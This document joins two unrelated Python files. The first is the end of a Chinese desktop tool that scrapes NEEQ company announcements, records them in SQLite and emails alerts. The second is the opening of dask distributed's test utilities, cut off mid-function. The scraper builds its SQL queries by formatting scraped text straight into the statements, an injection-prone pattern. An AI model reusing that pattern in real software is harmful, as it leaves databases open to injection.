main_msg.attach(MIMEText(mail_msg, 'html', 'utf-8'))
main_msg['From'] = _format_addr(u'公告推送<%s>' % mail_user)
main_msg['To'] = _format_addr(u'公告收件<%s>' % receivers)
main_msg['Subject'] = Header(disclosureTitle, 'utf-8').encode()
try:
smtpObj = smtplib.SMTP('smtp.qq.com', 587)
# smtp = smtplib.SMTP_SSL(mailserver)
# smtpObj = smtplib.SMTP('smtp.163.com', 25)
smtpObj.ehlo()
smtpObj.starttls()
smtpObj.login(mail_user, mail_pass)
smtpObj.sendmail(sender, receivers, main_msg.as_string())
smtpObj.quit()
print("邮件发送成功")
logging.info("邮件发送成功")
return 1
except smtplib.SMTPException as e:
print("无法发送邮件")
logging.error("Error: 无法发送邮件, %s" % e)
return 0
def run():
companyCd = entry.get().strip()
companyName = entry11.get().strip()
startTime = entry21.get().strip()
endTime = entry31.get().strip()
receiveMail = entry41.get().strip()
if companyCd == '' and companyName == '':
messagebox.showinfo('提示', '公司名称和公司代码不能都为空,请检查')
return
if companyCd != '' and companyName != '':
messagebox.showinfo('提示', '公司名称和公司代码不能同时填写,请检查')
return
if len(startTime) != 10:
messagebox.showinfo('提示', '开始日期格式不对,请检查')
return
# if len(endTime) != 10:
# messagebox.showinfo('提示', '结束日期格式不对,请检查')
# return
h = win32gui.FindWindow('TkTopLevel','中小企业股份转让系统公告查询工具')
win32gui.ShowWindow(h,win32con.SW_HIDE)
hinst = win32api.GetModuleHandle(None)
iconPathName = "icon.ico"
if os.path.isfile(iconPathName):
icon_flags = win32con.LR_LOADFROMFILE | win32con.LR_DEFAULTSIZE
hicon = win32gui.LoadImage(hinst, iconPathName, win32con.IMAGE_ICON, 0, 0, icon_flags)
else:
print('???icon???????')
hicon = win32gui.LoadIcon(0, win32con.IDI_APPLICATION)
flags = win32gui.NIF_ICON | win32gui.NIF_MESSAGE | win32gui.NIF_TIP
nid = (h, 0, flags, win32con.WM_USER + 20, hicon, "公告推送")
try:
win32gui.Shell_NotifyIcon(win32gui.NIM_ADD, nid)
except:
print("Failed to add the taskbar icon - is explorer running?")
# flags = win32gui.NIF_ICON | win32gui.NIF_MESSAGE | win32gui.NIF_TIP
# nid = (h, 0, win32gui.NIF_INFO, win32con.WM_USER + 20, 'icon.ico', "tooltip")
# win32gui.Shell_NotifyIcon(win32gui.NIM_ADD, nid)
def get():
while 1:
companyCd = entry.get().strip()
if companyCd != '':
companyCd_list = companyCd.split(';')
for ccd in companyCd_list:
db = sqlite3.connect("announcement.db")
c = db.cursor()
data = {
"disclosureType[]": 5,
"disclosureSubtype[]": None,
"page": 0,
"startTime": startTime,
"endTime": endTime,
"companyCd": ccd,
"isNewThree": 1,
"keyword": None,
"xxfcbj[]": None,
"hyType[]": None,
"needFields[]": ["companyCd", "companyName", "disclosureTitle", "destFilePath", "publishDate",
"xxfcbj",
"destFilePath", "fileExt", "xxzrlx"],
"sortfield": "xxssdq",
"sorttype": "asc",
}
news_list = []
response1 = requests.post(URL, data)
# print(response1.text)
response2 = re.search('(?<=\(\[)(.*?)(?=]\))', response1.text).group()
# print(response2)
j = json.loads(response2)['listInfo']
if j['content'] == []:
messagebox.showinfo('提示', '没有查询到信息,请检查公司代码或名称是否正确')
return
else:
totalElements = j['totalElements']
totalPages = j['totalPages']
logging.info("通过代码%s查询到%d条公告,共%d页" % (ccd, totalElements, totalPages))
# label70 = Label(root, text="通过代码%s查询到%d条公告,共%d页" % (ccd, totalElements, totalPages),
# font=('楷体', 12), fg='black')
# label70.grid(row=7, column=0, columnspan=2, sticky=W)
for n in range(totalPages):
data = {
"disclosureType[]": 5,
"disclosureSubtype[]": None,
"page": n,
"startTime": startTime,
"endTime": endTime,
"companyCd": ccd,
"isNewThree": 1,
"keyword": None,
"xxfcbj[]": None,
"hyType[]": None,
"needFields[]": ["companyCd", "companyName", "disclosureTitle", "destFilePath",
"publishDate",
"xxfcbj",
"destFilePath", "fileExt", "xxzrlx"],
"sortfield": "xxssdq",
"sorttype": "asc",
}
logging.info("正在处理第%d页" % (n + 1))
# label80 = Label(root, text="正在处理第%d页" % (n + 1), font=('楷体', 12), fg='black')
# label80.grid(row=8, column=0, columnspan=2, sticky=W)
response3 = requests.post(URL, data)
response4 = re.search('(?<=\(\[)(.*?)(?=]\))', response3.text).group()
j = json.loads(response4)['listInfo']
list = j['content']
# 循环本页内容查询数据库、发送邮件
for li in list:
# print(li)
companyCd2 = li['companyCd']
companyName2 = li['companyName']
destFilePath = "http://www.neeq.com.cn" + li['destFilePath']
disclosureTitle = li['disclosureTitle']
publishDate = li['publishDate']
xxfcbj = li['xxfcbj']
xxzrlx = li['xxzrlx']
result = c.execute("SELECT * FROM announcement where filePath = '%s'" % destFilePath)
if result.fetchone():
print(disclosureTitle, " 该公告数据库中已存在\n")
logging.info(disclosureTitle + " 该公告数据库中已存在")
# label90 = Label(root, text=disclosureTitle + " 该公告数据库中已存在", font=('楷体', 12), fg='black')
# label90.grid(row=9, column=0, columnspan=2, sticky=W)
else:
# 发送邮件
mailResult = sendMails(receiveMail, companyCd2, companyName2, disclosureTitle, publishDate,
destFilePath)
# print(mailResult)
if mailResult == 1:
data = "NULL,\'%s\',\'%s\',\'%s\',\'%s\',\'%s\'" % (
companyCd2, companyName2, disclosureTitle, publishDate, destFilePath)
# print(data, "\n")
c.execute('INSERT INTO announcement VALUES (%s)' % data)
db.commit()
print(disclosureTitle, " 该公告已存入数据库\n")
logging.info(disclosureTitle + " 该公告已存入数据库")
# label90 = Label(root, text=disclosureTitle + " 该公告已存入数据库", font=('楷体', 12), fg='black')
# label90.grid(row=9, column=0, columnspan=2, sticky=W)
time.sleep(5)
time.sleep(20) # 获取一个页面后休息3秒,防止请求服务器过快
db.close()
if companyName != '':
companyName_list = companyName.split(';')
for keyword in companyName_list:
db = sqlite3.connect("announcement.db")
c = db.cursor()
data = {
"disclosureType[]": 5,
"disclosureSubtype[]": None,
"page": 0,
"startTime": startTime,
"endTime": endTime,
"companyCd": None,
"isNewThree": 1,
"keyword": keyword,
"xxfcbj[]": None,
"hyType[]": None,
"needFields[]": ["companyCd", "companyName", "disclosureTitle", "destFilePath", "publishDate",
"xxfcbj",
"destFilePath", "fileExt", "xxzrlx"],
"sortfield": "xxssdq",
"sorttype": "asc",
}
news_list = []
response1 = requests.post(URL, data)
# print(response1.text)
response2 = re.search('(?<=\(\[)(.*?)(?=]\))', response1.text).group()
# print(response2)
j = json.loads(response2)['listInfo']
if j['content'] == []:
messagebox.showinfo('提示', '没有查询到信息,请检查公司代码或名称是否正确')
return
else:
totalElements = j['totalElements']
totalPages = j['totalPages']
logging.info("通过关键字%s查询到%d条公告,共%d页" % (keyword, totalElements, totalPages))
# label70 = Label(root, text="通过代码%s查询到%d条公告,共%d页" % (ccd, totalElements, totalPages),
# font=('楷体', 12), fg='black')
# label70.grid(row=7, column=0, columnspan=2, sticky=W)
for n in range(totalPages):
data = {
"disclosureType[]": 5,
"disclosureSubtype[]": None,
"page": n,
"startTime": startTime,
"endTime": endTime,
"companyCd": companyCd,
"isNewThree": 1,
"keyword": keyword,
"xxfcbj[]": None,
"hyType[]": None,
"needFields[]": ["companyCd", "companyName", "disclosureTitle", "destFilePath",
"publishDate",
"xxfcbj",
"destFilePath", "fileExt", "xxzrlx"],
"sortfield": "xxssdq",
"sorttype": "asc",
}
logging.info("正在处理第%d页" % (n + 1))
# label80 = Label(root, text="正在处理第%d页" % (n + 1), font=('楷体', 12), fg='black')
# label80.grid(row=8, column=0, columnspan=2, sticky=W)
response3 = requests.post(URL, data)
response4 = re.search('(?<=\(\[)(.*?)(?=]\))', response3.text).group()
j = json.loads(response4)['listInfo']
list = j['content']
# 循环本页内容查询数据库、发送邮件
for li in list:
# print(li)
companyCd2 = li['companyCd']
companyName2 = li['companyName']
destFilePath = "http://www.neeq.com.cn" + li['destFilePath']
disclosureTitle = li['disclosureTitle']
publishDate = li['publishDate']
xxfcbj = li['xxfcbj']
xxzrlx = li['xxzrlx']
result = c.execute("SELECT * FROM announcement where filePath = '%s'" % destFilePath)
if result.fetchone():
print(disclosureTitle, " 该公告数据库中已存在\n")
logging.info(disclosureTitle + " 该公告数据库中已存在")
# label90 = Label(root, text=disclosureTitle + " 该公告数据库中已存在", font=('楷体', 12), fg='black')
# label90.grid(row=9, column=0, columnspan=2, sticky=W)
else:
# 发送邮件
mailResult = sendMails(receiveMail, companyCd2, companyName2, disclosureTitle, publishDate,
destFilePath)
# print(mailResult)
if mailResult == 1:
data = "NULL,\'%s\',\'%s\',\'%s\',\'%s\',\'%s\'" % (
companyCd2, companyName2, disclosureTitle, publishDate, destFilePath)
# print(data, "\n")
c.execute('INSERT INTO announcement VALUES (%s)' % data)
db.commit()
print(disclosureTitle, " 该公告已存入数据库\n")
logging.info(disclosureTitle + " 该公告已存入数据库")
# label90 = Label(root, text=disclosureTitle + " 该公告已存入数据库", font=('楷体', 12), fg='black')
# label90.grid(row=9, column=0, columnspan=2, sticky=W)
time.sleep(1)
time.sleep(3) # 获取一个页面后休息3秒,防止请求服务器过快
db.close()
logging.info("本次查询结束 .,10分钟后开始下次查询")
label70 = Label(root, text='本次查询结束 .,10分钟后开始下次查询', font=('楷体', 10), fg='black')
label70.grid(row=7, column=0, columnspan=2, sticky=W)
time.sleep(600)
t = Thread(target=get)
t.start()
logging.basicConfig(filename='./log.log', format='[%(asctime)s-%(filename)s-%(levelname)s:%(message)s]',
level=logging.DEBUG, filemode='a', datefmt='%Y-%m-%d %I:%M:%S %p')
URL = 'http://www.neeq.com.cn/disclosureInfoController/infoResult_zh.do?callback=jQuery331_1596699678177'
root = Tk()
root.title('中小企业股份转让系统公告查询工具')
root.geometry('430x190')
root.geometry('+400+200')
# 文本输入框前的提示文本
label = Label(root, text='公司代码:', width=10, font=('楷体', 12), fg='black')
label.grid(row=0, column=0, )
# 文本输入框-公司代码
entry = Entry(root, font=('微软雅黑', 12), width=35)
entry.grid(row=0, column=1, sticky=W)
# 文本输入框前的提示文本
label10 = Label(root, text='公司名称:', width=10, font=('楷体', 12), fg='black')
label10.grid(row=1, column=0)
# 文本输入框-公司名称
entry11 = Entry(root, font=('微软雅黑', 12), width=35)
entry11.grid(row=1, column=1, sticky=W)
# 开始日期
label20 = Label(root, text='起始日期:', width=10, font=('楷体', 12), fg='black')
label20.grid(row=2, column=0)
# 文本输入框-开始日期
sd = StringVar()
sd.set((datetime.today() + timedelta(days=-30)).strftime("%Y-%m-%d"))
entry21 = Entry(root, textvariable=sd, font=('微软雅黑', 12), width=35)
entry21.grid(row=2, column=1, sticky=W)
# 结束日期
label30 = Label(root, text='结束日期:', width=10, font=('楷体', 12), fg='black')
label30.grid(row=3, column=0)
# 文本输入框-结束日期
# datetime.today()
# ed = StringVar()
# ed.set(datetime.today().strftime("%Y-%m-%d"))
# entry31 = Entry(root, textvariable=ed, font=('微软雅黑', 12), width=29)
entry31 = Entry(root, font=('微软雅黑', 12), width=35)
entry31.grid(row=3, column=1, sticky=W)
# 收件邮箱
label40 = Label(root, text='收件邮箱:', font=('楷体', 12), fg='black')
label40.grid(row=4, column=0)
# 文本输入框-收件邮箱
receiveMail = StringVar()
# receiveMail.set('610559273@qq.com')
receiveMail.set('lusheng1234@126.com')
entry41 = Entry(root, textvariable=receiveMail, font=('微软雅黑', 12), width=35)
entry41.grid(row=4, column=1, sticky=W)
# 初始化数据库
button50 = Button(root, text='初始化', width=8, font=('幼圆', 12), fg='purple', command=init_db)
button50.grid(row=5, column=0)
# 开始按钮
button51 = Button(root, text='开始', width=20, font=('幼圆', 12), fg='purple', command=run)
button51.grid(row=5, column=1)
label60 = Label(root, text=' ', font=('楷体', 6), fg='black')
label60.grid(row=6, column=0, columnspan=2, sticky=W)
# label70 = Label(root, text=' ', font=('楷体', 8), fg='black')
# label70.grid(row=6, column=0, columnspan=2, sticky=W)
# label80 = Label(root, text=' ', font=('楷体', 8), fg='black')
# label80.grid(row=6, column=0, columnspan=2, sticky=W)
# label90 = Label(root, text=' ', font=('楷体', 8), fg='black')
# label90.grid(row=6, column=0, columnspan=2, sticky=W)
# 执行信息
# label70 = Label(root, text='执行情况:' + 'dasdadas888888888888888888888888', font=('楷体', 12), fg='black')
# label70.grid(row=7, column=0, columnspan=2, sticky=W)
root.mainloop()
|
utils_test.py
|
import asyncio
import collections
from contextlib import contextmanager
import copy
from datetime import timedelta
import functools
from glob import glob
import io
import itertools
import logging
import logging.config
import os
import queue
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import textwrap
import threading
from time import sleep
import uuid
import warnings
import weakref
try:
import ssl
except ImportError:
ssl = None
import pytest
import dask
from toolz import merge, memoize, assoc
from tornado import gen, queues
from tornado.gen import TimeoutError
from tornado.ioloop import IOLoop
from . import system
from .client import default_client, _global_clients, Client
from .compatibility import WINDOWS
from .comm import Comm
from .config import initialize_logging
from .core import connect, rpc, CommClosedError
from .deploy import SpecCluster
from .metrics import time
from .process import _cleanup_dangling
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
ignoring,
log_errors,
mp_context,
get_ip,
get_ipv6,
DequeHandler,
reset_logger_locks,
sync,
iscoroutinefunction,
thread_state,
_offload_executor,
)
from .worker import Worker
from .nanny import Nanny
try:
import dask.array # register config
except ImportError:
pass
logger = logging.getLogger(__name__)
logging_levels = {
name: logger.level
for name, logger in logging.root.manager.loggerDict.items()
if isinstance(logger, logging.Logger)
}
_offload_executor.submit(lambda: None).result() # create thread during import
@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("print('hello world!')")
return local_file
@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
lines = (
"from distributed import Client",
"e = Client('127.0.0.1:8989')",
"print(e)",
)
local_file.write("\n".join(lines))
return local_file
@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("a+1")
return local_file
async def cleanup_global_workers():
for worker in Worker._instances:
await worker.close(report=False, executor_wait=False)
@pytest.fixture
def loop():
with check_instances():
with pristine_loop() as loop:
# Monkey-patch IOLoop.start to wait for loop stop
orig_start = loop.start
is_stopped = threading.Event()
is_stopped.set()
def start():
is_stopped.clear()
try:
orig_start()
finally:
is_stopped.set()
loop.start = start
yield loop
# Stop the loop in case it's still running
try:
sync(loop, cleanup_global_workers, callback_timeout=0.500)
loop.add_callback(loop.stop)
except RuntimeError as e:
if not re.match("IOLoop is clos(ed|ing)", str(e)):
raise
except gen.TimeoutError:
pass
else:
is_stopped.wait()
@pytest.fixture
def loop_in_thread():
with pristine_loop() as loop:
thread = threading.Thread(target=loop.start, name="test IOLoop")
thread.daemon = True
thread.start()
loop_started = threading.Event()
loop.add_callback(loop_started.set)
loop_started.wait()
yield loop
loop.add_callback(loop.stop)
thread.join(timeout=5)
@pytest.fixture
def zmq_ctx():
import zmq
ctx = zmq.Context.instance()
yield ctx
ctx.destroy(linger=0)
@contextmanager
def pristine_loop():
IOLoop.clear_instance()
IOLoop.clear_current()
loop = IOLoop()
loop.make_current()
assert IOLoop.current() is loop
try:
yield loop
finally:
try:
loop.close(all_fds=True)
except (KeyError, ValueError):
pass
IOLoop.clear_instance()
IOLoop.clear_current()
@contextmanager
def mock_ipython():
from unittest import mock
from distributed._ipython_utils import remote_magic
ip = mock.Mock()
ip.user_ns = {}
ip.kernel = None
def get_ip():
return ip
with mock.patch("IPython.get_ipython", get_ip), mock.patch(
"distributed._ipython_utils.get_ipython", get_ip
):
yield ip
# cleanup remote_magic client cache
for kc in remote_magic._clients.values():
kc.stop_channels()
remote_magic._clients.clear()
original_config = copy.deepcopy(dask.config.config)
def reset_config():
dask.config.config.clear()
dask.config.config.update(copy.deepcopy(original_config))
def nodebug(func):
"""
A decorator to disable debug facilities during timing-sensitive tests.
Warning: this doesn't affect already created IOLoops.
"""
@functools.wraps(func)
def wrapped(*args, **kwargs):
old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
try:
return func(*args, **kwargs)
finally:
if old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug
return wrapped
def nodebug_setup_module(module):
"""
A setup_module() that you can install in a test module to disable
debug facilities.
"""
module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if module._old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
def nodebug_teardown_module(module):
"""
A teardown_module() that you can install in a test module to reenable
debug facilities.
"""
if module._old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug
def inc(x):
return x + 1
def dec(x):
return x - 1
def mul(x, y):
return x * y
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise RuntimeError("hello!")
def double(x):
return x * 2
def slowinc(x, delay=0.02):
sleep(delay)
return x + 1
def slowdec(x, delay=0.02):
sleep(delay)
return x - 1
def slowdouble(x, delay=0.02):
sleep(delay)
return 2 * x
def randominc(x, scale=1):
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y, delay=0.02):
sleep(delay)
return x + y
def slowsum(seq, delay=0.02):
sleep(delay)
return sum(seq)
def slowidentity(*args, **kwargs):
delay = kwargs.get("delay", 0.02)
sleep(delay)
if len(args) == 1:
return args[0]
else:
return args
def run_for(duration, timer=time):
"""
Burn CPU for *duration* seconds.
"""
deadline = timer() + duration
while timer() <= deadline:
pass
# This dict grows at every varying() invocation
_varying_dict = collections.defaultdict(int)
_varying_key_gen = itertools.count()
class _ModuleSlot(object):
def __init__(self, modname, slotname):
self.modname = modname
self.slotname = slotname
def get(self):
return getattr(sys.modules[self.modname], self.slotname)
def varying(items):
"""
Return a function that returns a result (or raises an exception)
from *items* at each call.
"""
# cloudpickle would serialize the *values* of all globals
# used by *func* below, so we can't use `global <something>`.
# Instead look up the module by name to get the original namespace
# and not a copy.
slot = _ModuleSlot(__name__, "_varying_dict")
key = next(_varying_key_gen)
def func():
dct = slot.get()
i = dct[key]
if i == len(items):
raise IndexError
else:
x = items[i]
dct[key] = i + 1
if isinstance(x, Exception):
raise x
else:
return x
return func
def map_varying(itemslists):
"""
Like *varying*, but return the full specification for a map() call
on multiple items lists.
"""
def apply(func, *args, **kwargs):
return func(*args, **kwargs)
return apply, list(map(varying, itemslists))
async def geninc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
def compile_snippet(code, dedent=True):
if dedent:
code = textwrap.dedent(code)
code = compile(code, "<dynamic>", "exec")
ns = globals()
exec(code, ns, ns)
if sys.version_info >= (3, 5):
compile_snippet(
"""
async def asyncinc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
"""
)
assert asyncinc # noqa: F821
else:
asyncinc = None
_readone_queues = {}
async def readone(comm):
"""
Read one message at a time from a comm that reads lists of
messages.
"""
try:
q = _readone_queues[comm]
except KeyError:
q = _readone_queues[comm] = queues.Queue()
async def background_read():
while True:
try:
messages = await comm.read()
except CommClosedError:
break
for msg in messages:
q.put_nowait(msg)
q.put_nowait(None)
del _readone_queues[comm]
background_read()
msg = await q.get()
if msg is None:
raise CommClosedError
else:
return msg
def run_scheduler(q, nputs, port=0, **kwargs):
from distributed import Scheduler
# On Python 2.7 and Unix, fork() is used to spawn child processes,
# so avoid inheriting the parent's IO loop.
with pristine_loop() as loop:
async def _():
scheduler = await Scheduler(
validate=True, host="127.0.0.1", port=port, **kwargs
)
for i in range(nputs):
q.put(scheduler.address)
await scheduler.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_worker(q, scheduler_q, **kwargs):
from distributed import Worker
reset_logger_locks()
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Worker(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_nanny(q, scheduler_q, **kwargs):
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Nanny(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
@contextmanager
def check_active_rpc(loop, active_rpc_timeout=1):
active_before = set(rpc.active)
yield
# Some streams can take a bit of time to notice their peer
# has closed, and keep a coroutine (*) waiting for a CommClosedError
# before calling close_rpc() after a CommClosedError.
# This would happen especially if a non-localhost address is used,
# as Nanny does.
# (*) (example: gather_from_workers())
def fail():
pytest.fail(
"some RPCs left active by test: %s" % (set(rpc.active) - active_before)
)
async def wait():
await async_wait_for(
lambda: len(set(rpc.active) - active_before) == 0,
timeout=active_rpc_timeout,
fail_func=fail,
)
loop.run_sync(wait)
@pytest.fixture
def cluster_fixture(loop):
with cluster() as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def s(cluster_fixture):
scheduler, workers = cluster_fixture
return scheduler
@pytest.fixture
def a(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[0]
@pytest.fixture
def b(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[1]
@pytest.fixture
def client(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@pytest.fixture
def client_secondary(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@contextmanager
def tls_cluster_context(
worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs
):
security = security or tls_only_security()
worker_kwargs = assoc(worker_kwargs or {}, "security", security)
scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security)
with cluster(
worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs
) as (s, workers):
yield s, workers
@pytest.fixture
def tls_cluster(loop, security):
with tls_cluster_context(security=security) as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def tls_client(tls_cluster, loop, security):
s, workers = tls_cluster
with Client(s["address"], security=security, loop=loop) as client:
yield client
@pytest.fixture
def security():
return tls_only_security()
@contextmanager
def cluster(
nworkers=2, nanny=False, worker_kwargs={}, active_rpc_timeout=1, scheduler_kwargs={}
):
ws = weakref.WeakSet()
enable_proctitle_on_children()
with clean(timeout=active_rpc_timeout, threads=False) as loop:
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
# The scheduler queue will receive the scheduler's address
scheduler_q = mp_context.Queue()
# Launch scheduler
scheduler = mp_context.Process(
name="Dask cluster test: Scheduler",
target=run_scheduler,
args=(scheduler_q, nworkers + 1),
kwargs=scheduler_kwargs,
)
ws.add(scheduler)
scheduler.daemon = True
scheduler.start()
# Launch workers
workers = []
for i in range(nworkers):
q = mp_context.Queue()
fn = "_test_worker-%s" % uuid.uuid4()
kwargs = merge(
{
"nthreads": 1,
"local_directory": fn,
"memory_limit": system.MEMORY_LIMIT,
},
worker_kwargs,
)
proc = mp_context.Process(
name="Dask cluster test: Worker",
target=_run_worker,
args=(q, scheduler_q),
kwargs=kwargs,
)
ws.add(proc)
workers.append({"proc": proc, "queue": q, "dir": fn})
for worker in workers:
worker["proc"].start()
try:
for worker in workers:
worker["address"] = worker["queue"].get(timeout=5)
except queue.Empty:
raise pytest.xfail.Exception("Worker failed to start in test")
saddr = scheduler_q.get()
start = time()
try:
try:
security = scheduler_kwargs["security"]
rpc_kwargs = {"connection_args": security.get_connection_args("client")}
except KeyError:
rpc_kwargs = {}
with rpc(saddr, **rpc_kwargs) as s:
while True:
nthreads = loop.run_sync(s.ncores)
if len(nthreads) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
# avoid sending processes down to function
yield {"address": saddr}, [
{"address": w["address"], "proc": weakref.ref(w["proc"])}
for w in workers
]
finally:
logger.debug("Closing out test cluster")
loop.run_sync(
lambda: disconnect_all(
[w["address"] for w in workers], timeout=0.5, rpc_kwargs=rpc_kwargs
)
)
loop.run_sync(lambda: disconnect(saddr, timeout=0.5, rpc_kwargs=rpc_kwargs))
scheduler.terminate()
scheduler_q.close()
scheduler_q._reader.close()
scheduler_q._writer.close()
for w in workers:
w["proc"].terminate()
w["queue"].close()
w["queue"]._reader.close()
w["queue"]._writer.close()
scheduler.join(2)
del scheduler
for proc in [w["proc"] for w in workers]:
proc.join(timeout=2)
with ignoring(UnboundLocalError):
del worker, w, proc
del workers[:]
for fn in glob("_test_worker-*"):
with ignoring(OSError):
shutil.rmtree(fn)
try:
client = default_client()
except ValueError:
pass
else:
client.close()
start = time()
while any(proc.is_alive() for proc in ws):
text = str(list(ws))
sleep(0.2)
assert time() < start + 5, ("Workers still around after five seconds", text)
async def disconnect(addr, timeout=3, rpc_kwargs=None):
rpc_kwargs = rpc_kwargs or {}
async def do_disconnect():
with ignoring(EnvironmentError, CommClosedError):
with rpc(addr, **rpc_kwargs) as w:
await w.terminate(close=True)
with ignoring(TimeoutError):
await gen.with_timeout(timedelta(seconds=timeout), do_disconnect())
async def disconnect_all(addresses, timeout=3, rpc_kwargs=None):
await asyncio.gather(*[disconnect(addr, timeout, rpc_kwargs) for addr in addresses])
def gen_test(timeout=10):
""" Coroutine test
@gen_test(timeout=5)
def test_foo():
yield ... # use tornado coroutines
"""
def _(func):
def test_func():
with clean() as loop:
if iscoroutinefunction(func):
cor = func
else:
cor = gen.coroutine(func)
loop.run_sync(cor, timeout=timeout)
return test_func
return _
from .scheduler import Scheduler
from .worker import Worker
async def start_cluster(
nthreads,
scheduler_addr,
loop,
security=None,
Worker=Worker,
scheduler_kwargs={},
worker_kwargs={},
):
s = await Scheduler(
loop=loop,
validate=True,
security=security,
port=0,
host=scheduler_addr,
**scheduler_kwargs
)
workers = [
Worker(
s.address,
nthreads=ncore[1],
name=i,
security=security,
loop=loop,
validate=True,
host=ncore[0],
**(merge(worker_kwargs, ncore[2]) if len(ncore) > 2 else worker_kwargs)
)
for i, ncore in enumerate(nthreads)
]
# for w in workers:
# w.rpc = workers[0].rpc
await asyncio.gather(*workers)
start = time()
while len(s.workers) < len(nthreads) or any(
comm.comm is None for comm in s.stream_comms.values()
):
await asyncio.sleep(0.01)
if time() - start > 5:
await asyncio.gather(*[w.close(timeout=1) for w in workers])
await s.close(fast=True)
raise Exception("Cluster creation timeout")
return s, workers
async def end_cluster(s, workers):
logger.debug("Closing out test cluster")
async def end_worker(w):
with ignoring(TimeoutError, CommClosedError, EnvironmentError):
await w.close(report=False)
await asyncio.gather(*[end_worker(w) for w in workers])
await s.close() # wait until scheduler stops completely
s.stop()
def gen_cluster(
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 2)],
ncores=None,
scheduler="127.0.0.1",
timeout=10,
security=None,
Worker=Worker,
client=False,
scheduler_kwargs={},
worker_kwargs={},
client_kwargs={},
active_rpc_timeout=1,
config={},
clean_kwargs={},
):
from distributed import Client
""" Coroutine test with small cluster
@gen_cluster()
def test_foo(scheduler, worker1, worker2):
yield ... # use tornado coroutines
See also:
start
end
"""
if ncores is not None:
warnings.warn("ncores= has moved to nthreads=", stacklevel=2)
nthreads = ncores
worker_kwargs = merge(
{"memory_limit": system.MEMORY_LIMIT, "death_timeout": 10}, worker_kwargs
)
def _(func):
if not iscoroutinefunction(func):
func = gen.coroutine(func)
def test_func():
result = None
workers = []
with clean(timeout=active_rpc_timeout, **clean_kwargs) as loop:
async def coro():
with dask.config.set(config):
s = False
for i in range(5):
try:
s, ws = await start_cluster(
nthreads,
scheduler,
loop,
security=security,
Worker=Worker,
scheduler_kwargs=scheduler_kwargs,
worker_kwargs=worker_kwargs,
)
except Exception as e:
logger.error(
"Failed to start gen_cluster, retrying",
exc_info=True,
)
else:
workers[:] = ws
args = [s] + workers
break
if s is False:
raise Exception("Could not start cluster")
if client:
c = await Client(
s.address,
loop=loop,
security=security,
asynchronous=True,
**client_kwargs
)
args = [c] + args
try:
future = func(*args)
if timeout:
future = gen.with_timeout(
timedelta(seconds=timeout), future
)
result = await future
if s.validate:
s.validate_state()
finally:
if client and c.status not in ("closing", "closed"):
await c._close(fast=s.status == "closed")
await end_cluster(s, workers)
await gen.with_timeout(
timedelta(seconds=1), cleanup_global_workers()
)
try:
c = await default_client()
except ValueError:
pass
else:
await c._close(fast=True)
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
await asyncio.sleep(0.05)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
# raise ValueError("Unclosed Comms", L)
print("Unclosed Comms", L)
return result
result = loop.run_sync(
coro, timeout=timeout * 2 if timeout else timeout
)
for w in workers:
if getattr(w, "data", None):
try:
w.data.clear()
except EnvironmentError:
# zict backends can fail if their storage directory
# was already removed
pass
del w.data
return result
return test_func
return _
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
def terminate_process(proc):
if proc.poll() is None:
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
if sys.version_info[0] == 3:
proc.wait(10)
else:
start = time()
while proc.poll() is None and time() < start + 10:
sleep(0.02)
finally:
# Make sure we don't leave the process lingering around
with ignoring(OSError):
proc.kill()
@contextmanager
def popen(args, **kwargs):
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
dump_stdout = False
args = list(args)
if sys.platform.startswith("win"):
args[0] = os.path.join(sys.prefix, "Scripts", args[0])
else:
args[0] = os.path.join(
os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0]
)
